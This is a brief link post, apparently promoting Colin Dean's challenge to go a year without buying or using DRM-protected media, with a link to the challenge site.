Can you go a year without DRM?
http://www.yearwithoutdrm.com/
Colin Dean Go a year without DRM